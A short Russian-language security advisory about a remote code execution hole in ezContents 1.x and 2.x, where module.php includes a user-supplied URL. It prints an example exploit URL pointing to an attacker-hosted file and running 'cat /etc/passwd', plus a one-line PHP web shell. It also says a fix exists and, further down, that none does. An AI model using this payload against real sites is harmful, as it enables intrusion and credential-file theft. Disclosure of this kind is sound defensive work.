Security Lab

Удаленное выполнение произвольного кода в ezContents

Дата публикации:15.01.2004
Дата изменения:17.10.2006
Всего просмотров:1111
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: ezContents 1.x
ezContents 2.x
Уязвимые версии: ezContents

Описание: Уязвимость обнаружена в ezContents. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе.

Сценарий module.php не фильтрует данные, представленные пользователем в переменной 'link':

http://[target]/module.php?link=http://[attacker]/index.php&cmd=cat /etc/passwd

----index.php----
<?
system($cmd);
?>
-----------------

URL производителя: http://www.ezcontents.org

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Remote Code Execution in ezContents